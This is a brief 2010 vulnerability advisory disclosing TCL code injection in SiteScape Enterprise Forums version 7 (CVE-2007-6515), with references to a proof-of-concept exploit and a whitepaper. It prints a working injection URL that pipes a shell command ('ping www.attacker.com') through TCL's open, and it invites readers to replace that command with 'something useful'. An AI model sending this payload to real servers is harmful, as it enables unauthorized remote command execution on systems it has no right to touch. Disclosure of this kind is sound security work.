Discovered: 12-07-10
By: Spencer McIntyre (zeroSteiner) SecureState R&D Team
www.securestate.com


Background:
-----------
TCL Code injection has previously been discovered


New Details:
------------
Confirmation that SiteScape servers are vulnerable to TCL injection allowing remote code execution through TCL payloads. SecureState has released proof of concept exploit code for this vulnerability.


Vulnerable Versions:
--------------------
Tested on SiteScape Enterprise Forums version 7, others may be vulnerable.


TCL Code Injection:
-------------------
++ Replace "ping www.attacker.com" with something useful
http://www.website.com/dispatch.cgi/0;set fl [open "|ping www.attacker.com" ]


References:
-----------
BID     http://www.securityfocus.com/bid/26963
CVE     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6515
Post    http://securityvulns.com/Sdocument702.html
PoC     http://www.securestate.com/Documents/sitescape_sploit.txt
Whitepaper http://www.securestate.com/Downloadables/Documents/whitepapers-profiling-penetration/SiteScape_TCL_Code_Injection.pdf